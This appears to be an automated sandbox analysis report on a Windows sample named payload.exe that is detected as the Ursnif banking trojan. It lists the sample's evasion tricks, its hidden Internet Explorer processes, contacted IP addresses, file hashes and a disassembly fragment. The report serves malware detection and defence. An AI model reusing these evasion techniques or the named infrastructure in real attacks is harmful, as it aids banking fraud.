Source: payload.exe, 00000001.00000002.22428521610.01280000.00000040.sdmp, iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmp, iexplore.exe, 00000004.00000002.22318106587.03265000.00000004.sdmp, httpErrorPagesScripts[1].4.dr | String found in binary or memory: https://
Source: payload.exe, 00000001.00000002.22428521610.01280000.00000040.sdmp | String found in binary or memory: https://POST
Source: iexplore.exe, 00000004.00000002.22317162021.02DE0000.00000008.sdmp | String found in binary or memory: https://en.wikipedia.org/wiki/XSLT/Muenchian_grouping
Source: iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmp | String found in binary or memory: https://example.com
Source: iexplore.exe, 00000003.00000002.22413107787.0029E000.00000004.sdmp | String found in binary or memory: https://r20swj13mr.microsoft
Source: iexplore.exe, 00000003.00000002.22416420384.02EB7000.00000004.sdmp | String found in binary or memory: https://secure.comodo.com/CPS0
Source: iexplore.exe, 00000003.00000002.22416127969.02E39000.00000004.sdmp | String found in binary or memory: https://www.bing.com/D
Source: iexplore.exe, 00000003.00000002.22416073967.02E20000.00000004.sdmp | String found in binary or memory: https://www.bing.com/favicon.ico
Source: iexplore.exe, 00000003.00000002.22416073967.02E20000.00000004.sdmp | String found in binary or memory: https://www.bing.com/favicon.icoml
Source: iexplore.exe, 00000003.00000002.22413107787.0029E000.00000004.sdmp | String found in binary or memory: https://www.digicert.com/CPS0
Source: iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmp | String found in binary or memory: https://www.example.com.
Source: iexplore.exe, 00000003.00000002.22416027227.02DF0000.00000004.sdmp | String found in binary or memory: https://www.msn.com/spartan/ientp?locale=en-US&market=US&enableregulatorypsm=0&NTLogo=1
Uses HTTPSShow sources
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49171
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49170
Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49171 -> 443

E-Banking Fraud:

Detected Ursnif banking trojan
Source: C:\Users\user\Desktop\payload.exe | Code function: 1_2_00401B1C

System Summary:

Starts Internet Explorer in hidden mode
Source: C:\Program Files\Internet Explorer\iexplore.exe | Window hidden: window name: IEFrame
Contains functionality to call native functions
Source: C:\Users\user\Desktop\payload.exe | Code function: 1_2_0040134B memcpy,memcpy,memcpy,NtUnmapViewOfSection,RtlNtStatusToDosError,CloseHandle,memset
Source: C:\Users\user\Desktop\payload.exe | Code function: 1_2_004015E5 NtCreateSection,memset,RtlNtStatusToDosError,ZwClose
Source: C:\Users\user\Desktop\payload.exe | Code function: 1_2_00401203 LdrLoadDll,LdrGetProcedureAddress,NtProtectVirtualMemory,GetModuleHandleA,memcpy
Source: C:\Users\user\Desktop\payload.exe | Code function: 1_2_0040218D memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError
Source: C:\Users\user\Desktop\payload.exe | Code function: 1_2_004015A6 NtMapViewOfSection,RtlNtStatusToDosError
Source: C:\Users\user\Desktop\payload.exe | Code function: 1_2_004025C0 NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError
Source: C:\Users\user\Desktop\payload.exe | Code function: 1_2_00402653 GetModuleHandleA,GetCursorPos,GetModuleHandleA,GetModuleHandleA,NtGetContextThread,NtGetContextThread
Source: C:\Users\user\Desktop\payload.exe | Code function: 1_2_00402603 NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError
Source: C:\Users\user\Desktop\payload.exe | Code function: 1_2_00402F99 NtQueryVirtualMemory
Source: C:\Users\user\Desktop\payload.exe | Code function: 1_2_0040259F NtGetContextThread,RtlNtStatusToDosError
Source: C:\Users\user\Desktop\payload.exe | Code function: 1_2_00402D2C NtGetContextThread
Source: C:\Users\user\Desktop\payload.exe | Code function: 1_2_012A3B68 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose
Source: C:\Users\user\Desktop\payload.exe | Code function: 1_2_012AE040 NtProtectVirtualMemory,NtProtectVirtualMemory
Source: C:\Users\user\Desktop\payload.exe | Code function: 1_2_012AE018 NtProtectVirtualMemory,NtProtectVirtualMemory
Detected potential crypto function
Source: C:\Users\user\Desktop\payload.exe | Code function: 1_2_00402D78
Source: C:\Users\user\Desktop\payload.exe | Code function: 1_2_012A2922
Source: C:\Users\user\Desktop\payload.exe | Code function: 1_2_012A8F3C
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\payload.exe | Code function: String function: 00402BB3 appears 134 times
Source: C:\Users\user\Desktop\payload.exe | Code function: String function: 00401CAE appears 156 times
Source: C:\Users\user\Desktop\payload.exe | Code function: String function: 00402E18 appears 155 times
Searches the installation path of Mozilla Firefox
Source: C:\Program Files\Java\jre1.8.0_144\bin\ssvagent.exe | Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox\54.0.1 (x86 en-US)\Main Install Directory
Classification label
Source: classification engine | Classification label: mal72.bank.evad.winEXE@6/12@0/2
Contains functionality to instantiate COM classes
Source: C:\Users\user\Desktop\payload.exe | Code function: 1_2_012A5103 CoCreateInstance
Creates files inside the user directory
Source: C:\Program Files\Internet Explorer\iexplore.exe | File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High
Creates temporary files
Source: C:\Program Files\Internet Explorer\iexplore.exe | File created: C:\Users\HERBBL~1\AppData\Local\Temp\~DF281A968BBB46B987.TMP
PE file has an executable .text section and no other executable section
Source: payload.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Reads ini files
Source: C:\Program Files\Internet Explorer\iexplore.exe | File read: C:\Users\desktop.ini
Reads software policies
Source: C:\Users\user\Desktop\payload.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Sample is known by Antivirus
Source: payload.exe | virustotal: Detection: 53%
Spawns processes
Source: unknown | Process created: C:\Users\user\Desktop\payload.exe 'C:\Users\user\Desktop\payload.exe'
Source: unknown | Process created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown | Process created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' SCODEF:3772 CREDAT:275457 /prefetch:2
Source: unknown | Process created: C:\Program Files\Java\jre1.8.0_144\bin\ssvagent.exe 'C:\PROGRA~1\Java\JRE18~1.0_1\bin\ssvagent.exe' -new
Source: C:\Program Files\Internet Explorer\iexplore.exe | Process created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' SCODEF:3772 CREDAT:275457 /prefetch:2
Source: C:\Program Files\Internet Explorer\iexplore.exe | Process created: C:\Program Files\Java\jre1.8.0_144\bin\ssvagent.exe 'C:\PROGRA~1\Java\JRE18~1.0_1\bin\ssvagent.exe' -new
Uses an in-process (OLE) Automation server
Source: C:\Users\user\Desktop\payload.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Uses new MSVCR Dlls
Source: C:\Program Files\Internet Explorer\iexplore.exe | File opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dll

Data Obfuscation:

Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\payload.exe | Code function: 1_2_00402D67 push ecx; ret 1_2_00402D77
Source: C:\Users\user\Desktop\payload.exe | Code function: 1_2_012A8F2B push ecx; ret 1_2_012A8F3B
Source: C:\Users\user\Desktop\payload.exe | Code function: 1_1_004019C6 push eax; ret 1_1_00401AD3
Source: C:\Users\user\Desktop\payload.exe | Code function: 1_1_00402AD7 push eax; ret 1_1_00401355
Source: C:\Users\user\Desktop\payload.exe | Code function: 1_1_00402AD7 push eax; ret 1_1_00402B50
Source: C:\Users\user\Desktop\payload.exe | Code function: 1_1_004015CA push eax; ret 1_1_00401629
Source: C:\Users\user\Desktop\payload.exe | Code function: 1_1_0040274E push eax; ret 1_1_004027C9
Source: C:\Users\user\Desktop\payload.exe | Code function: 1_1_00402AD0 push dword ptr [00404000h]; ret 1_1_00402AD6
Source: C:\Users\user\Desktop\payload.exe | Code function: 1_1_00401AD4 push eax; ret 1_1_00401B81
Source: C:\Users\user\Desktop\payload.exe | Code function: 1_1_00401557 push eax; ret 1_1_004015BF
Source: C:\Users\user\Desktop\payload.exe | Code function: 1_1_00401557 push eax; ret 1_1_004026E6
Source: C:\Users\user\Desktop\payload.exe | Code function: 1_1_004027D7 push eax; ret 1_1_004023EE
Source: C:\Users\user\Desktop\payload.exe | Code function: 1_1_004027D7 push eax; ret 1_1_0040285E
Source: C:\Users\user\Desktop\payload.exe | Code function: 1_1_0040225D push eax; ret 1_1_004019C0
Source: C:\Users\user\Desktop\payload.exe | Code function: 1_1_0040225D push eax; ret 1_1_004022E3
Source: C:\Users\user\Desktop\payload.exe | Code function: 1_1_00402B5D push eax; ret 1_1_00402BAE
Source: C:\Users\user\Desktop\payload.exe | Code function: 1_1_004024DE push eax; ret 1_1_0040256C
Source: C:\Users\user\Desktop\payload.exe | Code function: 1_1_00402CDE push eax; ret 1_1_00402D87
Source: C:\Users\user\Desktop\payload.exe | Code function: 1_1_00401364 push eax; ret 1_1_004013FD
Source: C:\Users\user\Desktop\payload.exe | Code function: 1_1_00401364 push eax; ret 1_1_00402C41
Source: C:\Users\user\Desktop\payload.exe | Code function: 1_1_00401FE4 push eax; ret 1_1_00402060
Source: C:\Users\user\Desktop\payload.exe | Code function: 1_1_004026E8 push eax; ret 1_1_0040273F
Source: C:\Users\user\Desktop\payload.exe | Code function: 1_1_004026E8 push eax; ret 1_1_00402AC3
Source: C:\Users\user\Desktop\payload.exe | Code function: 1_1_00402868 push eax; ret 1_1_00402901
Source: C:\Users\user\Desktop\payload.exe | Code function: 1_1_004022EC push eax; ret 1_1_00402384
Source: C:\Users\user\Desktop\payload.exe | Code function: 1_1_004022EC push eax; ret 1_1_0040267C
Source: C:\Users\user\Desktop\payload.exe | Code function: 1_1_00402070 push eax; ret 1_1_00401D9B
Source: C:\Users\user\Desktop\payload.exe | Code function: 1_1_00402070 push eax; ret 1_1_004020E6
Source: C:\Users\user\Desktop\payload.exe | Code function: 1_1_004023F0 push eax; ret 1_1_0040244F
Source: C:\Users\user\Desktop\payload.exe | Code function: 1_1_00401BF1 push eax; ret 1_1_00401C9E
Source: C:\Users\user\Desktop\payload.exe | Code function: 1_1_004020F1 push eax; ret 1_1_00402178

Hooking and other Techniques for Hiding and Protection:

Writes registry values via WMI
Source: C:\Users\user\Desktop\payload.exe | WMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetDWORDValue
Source: C:\Users\user\Desktop\payload.exe | WMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\payload.exe | WMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetDWORDValue
Source: C:\Users\user\Desktop\payload.exe | WMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\payload.exe | WMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetStringValue
Disables application error messages (SetErrorMode)
Source: C:\Users\user\Desktop\payload.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Java\jre1.8.0_144\bin\ssvagent.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect sandboxes / dynamic malware analysis system (cursor check)
Source: C:\Users\user\Desktop\payload.exe | Code function: 1_2_00401070
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\payload.exe | Window / User API: threadDelayed 646
Found evasive API chain (may stop execution after checking a module file name)
Source: C:\Users\user\Desktop\payload.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess (graph_1-3081)
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\payload.exe TID: 3712 | Thread sleep count: 646 > 30
Source: C:\Users\user\Desktop\payload.exe TID: 3712 | Thread sleep time: -38760000s >= -60000s
Source: C:\Users\user\Desktop\payload.exe TID: 3768 | Thread sleep time: -60000s >= -60000s
Program exit points
Source: C:\Users\user\Desktop\payload.exe | API call chain: ExitProcess graph end node (graph_1-3044)
Source: C:\Users\user\Desktop\payload.exe | API call chain: ExitProcess graph end node (graph_1-3036)

Anti Debugging:

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Source: C:\Users\user\Desktop\payload.exe | System information queried: KernelDebuggerInformation
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\payload.exe | Code function: 1_2_00401203 LdrLoadDll,LdrGetProcedureAddress,NtProtectVirtualMemory,GetModuleHandleA,memcpy

HIPS / PFW / Operating System Protection Evasion:

May try to detect the Windows Explorer process (often used for injection)
Source: payload.exe, 00000001.00000002.22428381697.00530000.00000002.sdmp | Binary or memory string: Progman
Source: payload.exe, 00000001.00000002.22428381697.00530000.00000002.sdmp | Binary or memory string: Program Manager
Source: payload.exe, 00000001.00000002.22428381697.00530000.00000002.sdmp | Binary or memory string: Shell_TrayWnd

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\payload.exe | Code function: 1_2_012A44A2 cpuid
Contains functionality to query local / system time
Source: C:\Users\user\Desktop\payload.exe | Code function: 1_2_012A1BC6 GetSystemTimeAsFileTime,HeapFree
Contains functionality to query windows version
Source: C:\Users\user\Desktop\payload.exe | Code function: 1_2_00401AA8 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError
Queries the cryptographic machine GUID
Source: C:\Users\user\Desktop\payload.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Behavior Graph

Behavior graph (rendered as an image in the original report; only the recoverable node and edge content is kept here): Behavior Graph ID: 72253, Sample: payload, Startdate: 13/08/2018, Architecture: WINDOWS, Score: 72. Sample node: Multi AV Scanner detection for submitted file. payload.exe (started): Detected Ursnif banking trojan; Tries to detect sandboxes / dynamic malware analysis system (cursor check); Writes registry values via WMI; Creates a COM Internet Explorer object. iexplore.exe (started): Starts Internet Explorer in hidden mode; contacts cs9.wpc.v0cdn.net 152.199.19.161 (ports 443, 49170, 49171; ANSBB-ASNNET-1-AdvancedNetworksServicesIncUS, United States); starts a child iexplore.exe, which contacts 195.123.212.153 port 80 (ITL-LV, Ukraine) and starts ssvagent.exe.

Simulations

Behavior and APIs

Time | Type | Description
14:03:27 | API Interceptor | 1109x Sleep call for process: iexplore.exe modified
14:03:27 | API Interceptor | 738x Sleep call for process: payload.exe modified
14:03:29 | API Interceptor | 1x Sleep call for process: ssvagent.exe modified

Antivirus Detection

Initial Sample

Source | Detection | Scanner | Label
payload.exe | 54% | virustotal |

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

Source | Detection | Scanner | Label
cs9.wpc.v0cdn.net | 0% | virustotal |

URLs

No Antivirus matches

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Unpacked PEs

No yara matches

Startup

  • System is w7
  • payload.exe (PID: 3556 cmdline: 'C:\Users\user\Desktop\payload.exe' MD5: 9CB0D02CBC93981015F6C050A0778CFD)
  • iexplore.exe (PID: 3772 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: CA1F703CD665867E8132D2946FB55750)
    • iexplore.exe (PID: 3828 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' SCODEF:3772 CREDAT:275457 /prefetch:2 MD5: CA1F703CD665867E8132D2946FB55750)
      • ssvagent.exe (PID: 3880 cmdline: 'C:\PROGRA~1\Java\JRE18~1.0_1\bin\ssvagent.exe' -new MD5: 0953A0264879FD1E655B75B63B9083B7)
  • cleanup

Created / dropped Files

C:\Users\HERBBL~1\AppData\Local\Temp\JavaDeployReg.log
Process:C:\Program Files\Internet Explorer\iexplore.exe
File Type:ASCII text, with CRLF line terminators
Size (bytes):89
Entropy (8bit):4.444316889094987
Encrypted:false
MD5:E39E843636C8767DCABA07759491D8DB
SHA1:161A0E118CC29DEA9CA3EB1AAF85ABE6CFAB5929
SHA-256:9EDFC70826B8D8B781ABC70E10D1A42B89BAA393B506A3748C608693AD9016EB
SHA-512:58B13942E25AED7753B55F56E77591C8EF1DB6160786D9FC68173137EBDA724033F633CCA74B42CF459966D70C7CFF0754A7BF18B8CBE03840CEDCCEA4B83E88
Malicious:false
Reputation:low
C:\Users\HERBBL~1\AppData\Local\Temp\~DF094EE36918159728.TMP
Process:C:\Program Files\Internet Explorer\iexplore.exe
File Type:data
Size (bytes):39521
Entropy (8bit):0.9619404867412173
Encrypted:false
MD5:2036E7109356399BE73DDCB39C1888C5
SHA1:DD33E0F97C2850585965F3E152609F9DC6236F71
SHA-256:70FD390B8FE6494A7B2521D98C7CF695DF3B83E0693E74A0D17EBA3D37496801
SHA-512:9401E5D837DCB564E6509E72CA2B518C3CC2CF4F498B2A1153ACBB0B5066F931208BCBAD7FDBAB9507D33F130E7DCECE6C6A8115402258EEA4C9B0F7DA8EE235
Malicious:false
Reputation:low
C:\Users\HERBBL~1\AppData\Local\Temp\~DF281A968BBB46B987.TMP
Process:C:\Program Files\Internet Explorer\iexplore.exe
File Type:data
Size (bytes):12933
Entropy (8bit):0.4149132859771079
Encrypted:false
MD5:4371D5DE7C3B3531C2F537A7DBD92CDE
SHA1:DF5698BCB719BA4ADEB6F73A6129F8DC85A392D6
SHA-256:364B7FF729311EE6342E1EBBAEFEBDEF6676421F8B3CAAFC9748D2D01389AE31
SHA-512:7ED5C92CDDE5C4AE13959BAC2EE8BFF673C9821604E173AD3B28694865A6553C23827A2FC7569EA9B761B244D1D2AE0370B842099DA469F6A8B307CBF5CD8468
Malicious:false
Reputation:low
C:\Users\user\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
Process:C:\Program Files\Internet Explorer\iexplore.exe
File Type:PNG image, 16 x 16, 4-bit colormap, non-interlaced
Size (bytes):237
Entropy (8bit):6.1480026084285395
Encrypted:false
MD5:9FB559A691078558E77D6848202F6541
SHA1:EA13848D33C2C7F4F4BAA39348AEB1DBFAD3DF31
SHA-256:6D8A01DC7647BC218D003B58FE04049E24A9359900B7E0CEBAE76EDF85B8B914
SHA-512:0E08938568CD123BE8A20B87D9A3AAF5CB05249DE7F8286FF99D3FA35FC7AF7A9D9797DD6EFB6D1E722147DCFB74437DE520395234D0009D452FB96A8ECE236B
Malicious:false
Reputation:low
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{E2BC0F91-9EF0-11E8-B7AC-B2C276BF9C88}.dat
Process:C:\Program Files\Internet Explorer\iexplore.exe
File Type:Microsoft Word Document
Size (bytes):29272
Entropy (8bit):1.7733633340595316
Encrypted:false
MD5:6EA6E29A2BA248C4FB2919E02307398A
SHA1:F1BE5C7EADB01E9EC9BBA858F06DE30A49C3761B
SHA-256:4C237616F90AA56591D2DDBBE12B72AAB041C126DCB3700EE62C6BC68488E8D0
SHA-512:694D8A7537EB017A0C5C484A3E626BA08C33FC1E21C46EAA064BE774F086125A64CA7D64072F2F56159EAB929612E50AC9D04EBC80581063C59147EE13715BE2
Malicious:false
Reputation:low
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{E2BC0F93-9EF0-11E8-B7AC-B2C276BF9C88}.dat
Process:C:\Program Files\Internet Explorer\iexplore.exe
File Type:Microsoft Word Document
Size (bytes):27312
Entropy (8bit):1.8270581926954415
Encrypted:false
MD5:9F3D5B089731D1769B02F0BF7BF0E1E2
SHA1:115A3575A8A6EDA6BABEA94CE642D23B702EF0E5
SHA-256:F945FAA06B035677C1C4E589535A121AC0CDAE42A9CF5E8C7A915AD03390C267
SHA-512:E0FA6E360F46BACC1E4429E1DA89164393F70D2F3C5E88343BDE1C39DB55F79C616ED9E1739B5D2EA32493453D90417A967ED06A18F9233DA20A5F12D81B82F3
Malicious:false
Reputation:low
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0316J1PS\errorPageStrings[1]
Process:C:\Program Files\Internet Explorer\iexplore.exe
File Type:UTF-8 Unicode (with BOM) English text, with CRLF line terminators
Size (bytes):3470
Entropy (8bit):5.07679088805991
Encrypted:false
MD5:6B26ECFA58E37D4B5EC861FCDD3F04FA
SHA1:B69CD71F68FE35A9CE0D7EA17B5F1B2BAD9EA8FA
SHA-256:7F7D1069CA8A852C1C8EB36E1D988FE6A9C17ECB8EFF1F66FC5EBFEB5418723A
SHA-512:1676D43B977C07A3F6A5473F12FD16E56487803A1CB9771D0F189B1201642EE79480C33A010F08DC521E57332EC4C4D888D693C6A2323C97750E97640918C3F4
Malicious:false
Reputation:low
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0TZNT9WD\dnserror[1]
Process:C:\Program Files\Internet Explorer\iexplore.exe
File Type:HTML document text
Size (bytes):1857
Entropy (8bit):4.605068478069389
Encrypted:false
MD5:73C70B34B5F8F158D38A94B9D7766515
SHA1:E9EAA065BD6585A1B176E13615FD7E6EF96230A9
SHA-256:3EBD34328A4386B4EBA1F3D5F1252E7BD13744A6918720735020B4689C13FCF4
SHA-512:927DCD4A8CFDEB0F970CB4EE3F059168B37E1E4E04733ED3356F77CA0448D2145E1ABDD4F7CE1C6CA23C1E3676056894625B17987CC56C84C78E73F60E08FC0D
Malicious:false
Reputation:low
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0TZNT9WD\favicon[2].ico
Process:C:\Program Files\Internet Explorer\iexplore.exe
File Type:PNG image, 16 x 16, 4-bit colormap, non-interlaced
Size (bytes):237
Entropy (8bit):6.1480026084285395
Encrypted:false
MD5:9FB559A691078558E77D6848202F6541
SHA1:EA13848D33C2C7F4F4BAA39348AEB1DBFAD3DF31
SHA-256:6D8A01DC7647BC218D003B58FE04049E24A9359900B7E0CEBAE76EDF85B8B914
SHA-512:0E08938568CD123BE8A20B87D9A3AAF5CB05249DE7F8286FF99D3FA35FC7AF7A9D9797DD6EFB6D1E722147DCFB74437DE520395234D0009D452FB96A8ECE236B
Malicious:false
Reputation:low
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\77PTX9DT\NewErrorPageTemplate[1]
Process:C:\Program Files\Internet Explorer\iexplore.exe
File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
Size (bytes):1310
Entropy (8bit):4.810709096040597
Encrypted:false
MD5:CDF81E591D9CBFB47A7F97A2BCDB70B9
SHA1:8F12010DFAACDECAD77B70A3E781C707CF328496
SHA-256:204D95C6FB161368C795BB63E538FE0B11F9E406494BB5758B3B0D60C5F651BD
SHA-512:977DCC2C6488ACAF0E5970CEF1A7A72C9F9DC6BB82DA54F057E0853C8E939E4AB01B163EB7A5058E093A8BC44ECAD9D06880FDC883E67E28AC67FEE4D070A4CC
Malicious:false
Reputation:low
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\77PTX9DT\urlblockindex[1].bin
Process:C:\Program Files\Internet Explorer\iexplore.exe
File Type:data
Size (bytes):16
Entropy (8bit):1.6216407621868583
Encrypted:false
MD5:FA518E3DFAE8CA3A0E495460FD60C791
SHA1:E4F30E49120657D37267C0162FD4A08934800C69
SHA-256:775853600060162C4B4E5F883F9FD5A278E61C471B3EE1826396B6D129499AA7
SHA-512:D21667F3FB081D39B579178E74E9BB1B6E9A97F2659029C165729A58F1787DC0ADADD980CD026C7A601D416665A81AC13A69E49A6A2FE2FDD0967938AA645C07
Malicious:false
Reputation:low
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DEWWYACU\httpErrorPagesScripts[1]
Process:C:\Program Files\Internet Explorer\iexplore.exe
File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
Size (bytes):8714
Entropy (8bit):5.312819714818054
Encrypted:false
MD5:3F57B781CB3EF114DD0B665151571B7B
SHA1:CE6A63F996DF3A1CCCB81720E21204B825E0238C
SHA-256:46E019FA34465F4ED096A9665D1827B54553931AD82E98BE01EDB1DDBC94D3AD
SHA-512:8CBF4EF582332AE7EA605F910AD6F8A4BC28513482409FA84F08943A72CAC2CF0FA32B6AF4C20C697E1FAC2C5BA16B5A64A23AF0C11EEFBF69625B8F9F90C8FA
Malicious:false
Reputation:low

Contacted Domains/Contacted IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
cs9.wpc.v0cdn.net | 152.199.19.161 | true | false | 0%, virustotal | unknown

Contacted IPs

Public

IP | Country | ASN | ASN Name | Malicious
152.199.19.161 | United States | 1326 | ANSBB-ASNNET-1-AdvancedNetworksServicesIncUS | false
195.123.212.153 | Ukraine | 50979 | ITL-LV | false

Static File Info

General

File type:PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Entropy (8bit):7.475526133182752
TrID:
  • Win32 Executable (generic) a (10002005/4) 99.96%
  • Generic Win/DOS Executable (2004/3) 0.02%
  • DOS Executable Generic (2002/1) 0.02%
  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:payload.exe
File size:56832
MD5:9cb0d02cbc93981015f6c050a0778cfd
SHA1:9bc608af77957f031e9c23424eddd4841fc28784
SHA256:dde2035cc84948a03d5dfa1ac1f97e2b9ecae3d53b3bda3125add1a10a6d5be3
SHA512:d92429fb6dced7ddaf16a347bf9333e588d00b62bdd6b6726d84e6884785f447c57cd9a8cb45c39790d929f12fccdbed04ea78faa4daea57862328850bdbbf9a
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........E............H.l.....:.m.......y.....Rich....................PE..L....O1U.................$...........*.......@....@........

Static PE Info

General

Entrypoint:0x402ad7
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
DLL Characteristics:TERMINAL_SERVER_AWARE
Time Stamp:0x55314FC7 [Fri Apr 17 18:24:07 2015 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:4
OS Version Minor:0
File Version Major:4
File Version Minor:0
Subsystem Version Major:4
Subsystem Version Minor:0
Import Hash:d6cee5686b9eaf5ac075659b5a9daff2

Entrypoint Preview

Instruction
push eax
mov edx, 003456A4h
mov dword ptr [esp], ebp
mov ebp, esp
push 00000004h
add esp, FFFFFFA0h
push dword ptr [004050CFh]
call 6037E043h
push 004050C1h
call 6037E381h
push 004050C1h
call 6037E377h
push 00000001h
dec dword ptr [esp]
push 00405095h
push 00405086h
call 6037D1F9h
test eax, eax
jne 6037C81Dh
push 00000001h
dec dword ptr [esp]
push 00405095h
push 00405086h
call 6037D1DDh
cmp eax, 00000000h
jne 6037C800h
push 004050C1h
call 6037E334h
lea eax, dword ptr [00401E1Eh]
push eax
ret
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add bh, bh
xor eax, 004050CFh
call 6037DFCEh
push dword ptr [004050CFh]
call 6037DFC3h
push dword ptr [004050CFh]
call 6037DFB8h
push dword ptr [004050CFh]
call 6037DFADh
push dword ptr [004050CFh]
call 6037DFA2h
push 004050C1h

Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x477c | 0x78 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x6000 | 0xa500 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x2e20 | 0x494 | .text
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x4000 | 0xf4 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x22b4 | 0x2400 | False | 0.389214409722 | data | 5.40831994534 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0x4000 | 0xd46 | 0xe00 | False | 0.702566964286 | data | 6.47140549073 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
